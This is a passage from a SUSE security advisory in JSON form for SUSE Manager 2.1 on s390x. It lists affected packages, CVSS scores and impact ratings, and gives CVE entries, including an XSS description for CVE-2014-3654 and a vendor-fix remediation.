"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2015-02-25T20:05:05Z",
"details": "important"
}
],
"title": "CVE-2014-0242"
},
{
"cve": "CVE-2014-3654",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2014-3654"
}
],
"notes": [
{
"category": "general",
"text": "Multiple cross-site scripting (XSS) vulnerabilities in spacewalk-java 2.0.2 in Spacewalk and Red Hat Network (RHN) Satellite 5.5 and 5.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors to (1) kickstart/cobbler/CustomSnippetList.do, (2) channels/software/Entitlements.do, or (3) admin/multiorg/OrgUsers.do.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2014-3654",
"url": "https://www.suse.com/security/cve/CVE-2014-3654"
},
{
"category": "external",
"summary": "SUSE Bug 902182 for CVE-2014-3654",
"url": "https://bugzilla.suse.com/902182"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2015-02-25T20:05:05Z",
"details": "moderate"
}
],
"title": "CVE-2014-3654"
},
{
"cve": "CVE-2014-7811",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2014-7811"
}
],
"notes": [
{
"category": "general",
